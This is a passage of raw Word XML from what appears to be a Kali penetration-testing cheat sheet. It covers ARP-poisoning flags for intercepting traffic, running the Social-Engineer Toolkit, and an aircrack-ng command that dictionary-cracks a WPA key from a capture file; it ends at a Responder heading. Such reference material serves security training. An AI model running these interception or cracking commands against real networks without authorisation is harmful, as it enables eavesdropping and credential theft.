            <w:r w:rsidRPr="00435B4E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-t </w:t>
            </w:r>
            <w:r w:rsidRPr="00435B4E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>IPADRESS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00435B4E">
              <w:t>Specify a particular host</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22D5DB96" w14:textId="77777777" w:rsidR="00435B4E" w:rsidRDefault="00435B4E" w:rsidP="006E3BDB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00435B4E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-r </w:t>
            </w:r>
            <w:r w:rsidRPr="00435B4E">
              <w:t>Poison both hosts to capture traffic both directions</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53ABD78C" w14:textId="2BADAB92" w:rsidR="00435B4E" w:rsidRDefault="00435B4E" w:rsidP="006E3BDB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Don’t forget to end the command with the host you wish to intercept packets for, which will usually be the local gateway.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C61232" w14:paraId="0F57B4BF" w14:textId="77777777" w:rsidTr="006E3BDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7BAB485C" w14:textId="77777777" w:rsidR="00C61232" w:rsidRDefault="00C61232" w:rsidP="006E3BDB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7503FA3D" w14:textId="77777777" w:rsidR="00C61232" w:rsidRDefault="00C61232" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34A3EA13" w14:textId="77777777" w:rsidR="00C61232" w:rsidRPr="001E0F42" w:rsidRDefault="00C61232" w:rsidP="006E3BDB"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B868453" w14:textId="2817F2E9" w:rsidR="00D47DD4" w:rsidRDefault="00D47DD4" w:rsidP="00C364A5"/>
    <w:p w14:paraId="39CE9768" w14:textId="77777777" w:rsidR="00D47DD4" w:rsidRDefault="00D47DD4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6545B879" w14:textId="312318D3" w:rsidR="00D47DD4" w:rsidRDefault="00D47DD4" w:rsidP="00D47DD4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Testing, DoS and Miscellaneous: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEToolKit</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1067"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="2368"/>
        <w:gridCol w:w="7933"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D47DD4" w14:paraId="6A104054" w14:textId="77777777" w:rsidTr="00524262">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3EC2F776" w14:textId="6C9EF480" w:rsidR="00D47DD4" w:rsidRDefault="00D47DD4" w:rsidP="00524262">
            <w:r>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="0073701B">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="589C4D39" w14:textId="16FE9EAC" w:rsidR="00D47DD4" w:rsidRDefault="00D47DD4" w:rsidP="00524262">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>setoolkit</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00D47DD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(setoolkit is installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="132ABFE4" w14:textId="32DA489C" w:rsidR="00D47DD4" w:rsidRDefault="00D47DD4" w:rsidP="00524262">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r w:rsidRPr="00D47DD4">
              <w:t xml:space="preserve">The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the https://www.social-engineer.org launch and has quickly </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D47DD4">
              <w:t>became</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D47DD4">
              <w:t xml:space="preserve"> a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D47DD4" w14:paraId="495CB284" w14:textId="77777777" w:rsidTr="00524262">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0C80C0B1" w14:textId="6B9B3557" w:rsidR="00D47DD4" w:rsidRDefault="00D47DD4" w:rsidP="00524262">
            <w:r>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="0073701B">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="426D088A" w14:textId="77777777" w:rsidR="00D47DD4" w:rsidRDefault="00D47DD4" w:rsidP="00524262">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="432DA696" w14:textId="54AF1C0F" w:rsidR="00D47DD4" w:rsidRDefault="00D47DD4" w:rsidP="00524262">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>To run SET, simply use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D47DD4">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00D47DD4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> setoolkit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D47DD4" w14:paraId="4F1AC0CB" w14:textId="77777777" w:rsidTr="00524262">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="04394C9F" w14:textId="77777777" w:rsidR="00D47DD4" w:rsidRDefault="00D47DD4" w:rsidP="00524262"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="253D1AFF" w14:textId="77777777" w:rsidR="00D47DD4" w:rsidRDefault="00D47DD4" w:rsidP="00524262">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34417B0F" w14:textId="77777777" w:rsidR="00D47DD4" w:rsidRPr="001E0F42" w:rsidRDefault="00D47DD4" w:rsidP="00524262"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="197B3E76" w14:textId="77777777" w:rsidR="00C364A5" w:rsidRPr="00C364A5" w:rsidRDefault="00C364A5" w:rsidP="00C364A5"/>
    <w:p w14:paraId="07A9AC0C" w14:textId="1DE6E05C" w:rsidR="007D2F33" w:rsidRDefault="007D2F33">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B28A9" w14:textId="70B33673" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="007D2F33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Testing, DoS and Miscellaneous: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>aircrack-ng</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1067"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="2368"/>
        <w:gridCol w:w="7933"/>
      </w:tblGrid>
      <w:tr w:rsidR="007D2F33" w14:paraId="64474484" w14:textId="77777777" w:rsidTr="00177D28">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3763A8F2" w14:textId="6D7D9DEE" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="00177D28">
            <w:r>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="00880861">
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="055525AF" w14:textId="3D0F9DDC" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="00177D28">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>aircrack-ng</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00D47DD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00E73CA0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>aircrack-ng</w:t>
            </w:r>
            <w:r w:rsidRPr="00D47DD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A311B63" w14:textId="7A4F70B6" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="007D2F33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Aircrack-ng is a complete suite of tools to assess WiFi network security.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78F48A57" w14:textId="77777777" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="007D2F33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>It focuses on different areas of WiFi security:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="586C2297" w14:textId="77777777" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="007D2F33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4777E5C7" w14:textId="54A3FA5D" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="007D2F33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   - Monitoring: Packet capture and export of data to text files for further processing by third party tools</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DB6E4D9" w14:textId="31C8B28E" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="007D2F33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   - Attacking: Replay attacks, deauthentication, fake access points and others via packet injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7645B4" w14:textId="13C6700B" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="007D2F33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  - Testing: Checking WiFi cards and driver capabilities (capture and injection)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="705CE14E" w14:textId="77777777" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="007D2F33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Cracking: WEP and WPA PSK (WPA 1 and 2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="363C6226" w14:textId="77777777" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="007D2F33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E934EEA" w14:textId="458E2C89" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="007D2F33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>All tools are command line which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily on Linux but also Windows, macOS, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2F33" w14:paraId="4E00C7F0" w14:textId="77777777" w:rsidTr="00177D28">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1D1C702B" w14:textId="0C0C78EC" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="00177D28">
            <w:r>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="00880861">
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6707F0E5" w14:textId="77777777" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="00177D28">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F0D9421" w14:textId="0B2C6562" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="00177D28">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>To use aircrack-ng, simply use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00CA345C">
              <w:t xml:space="preserve">               </w:t>
            </w:r>
            <w:r w:rsidRPr="00E73CA0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">aircrack-ng </w:t>
            </w:r>
            <w:r w:rsidRPr="00E73CA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-a2 -b </w:t>
            </w:r>
            <w:r w:rsidRPr="00E73CA0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">20:E5:2A:E4:38:00 </w:t>
            </w:r>
            <w:r w:rsidRPr="00E73CA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-w </w:t>
            </w:r>
            <w:r w:rsidRPr="00E73CA0">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">PASSWORDS.txt </w:t>
            </w:r>
            <w:r w:rsidR="00CA345C" w:rsidRPr="00E73CA0">
              <w:rPr>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
              </w:rPr>
              <w:t>PCAP.cap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36B161C6" w14:textId="74E3B33D" w:rsidR="00CA345C" w:rsidRDefault="00CA345C" w:rsidP="00177D28">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r w:rsidRPr="00E73CA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">              -a1 </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>WEP attack</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E73CA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-a2</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>WPA/WPA2 attack</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="00E73CA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-b</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specify a BSSID</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E73CA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Wordlist to dictionary attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2F33" w14:paraId="19CAA0FE" w14:textId="77777777" w:rsidTr="00177D28">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0F032851" w14:textId="77777777" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="00177D28"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="072E7502" w14:textId="77777777" w:rsidR="007D2F33" w:rsidRDefault="007D2F33" w:rsidP="00177D28">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C4B8F71" w14:textId="77777777" w:rsidR="007D2F33" w:rsidRPr="001E0F42" w:rsidRDefault="007D2F33" w:rsidP="00177D28"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D39F27A" w14:textId="766CE5A3" w:rsidR="00F86ADC" w:rsidRDefault="00F86ADC"/>
    <w:p w14:paraId="4AB296C6" w14:textId="77777777" w:rsidR="00F86ADC" w:rsidRDefault="00F86ADC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D19CE9" w14:textId="70E5BE56" w:rsidR="00F86ADC" w:rsidRDefault="00F86ADC" w:rsidP="00F86ADC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Testing, DoS and Miscellaneous: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1067"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="2368"/>
        <w:gridCol w:w="7933"/>
      </w:tblGrid>
